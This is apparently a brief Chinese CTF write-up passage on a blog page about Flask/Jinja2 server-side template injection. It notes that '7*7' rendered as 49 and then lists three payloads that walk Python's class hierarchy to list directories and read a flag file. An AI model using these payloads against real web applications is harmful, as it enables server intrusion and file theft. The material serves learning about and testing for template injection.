赞
踩
7*7变成49了,应该存在模板注入
{{''.__class__.__mro__[2].__subclasses__()}}
{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}
从零学习flask模板注入
原理在这位师傅的文章里已经写的很详细啦
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。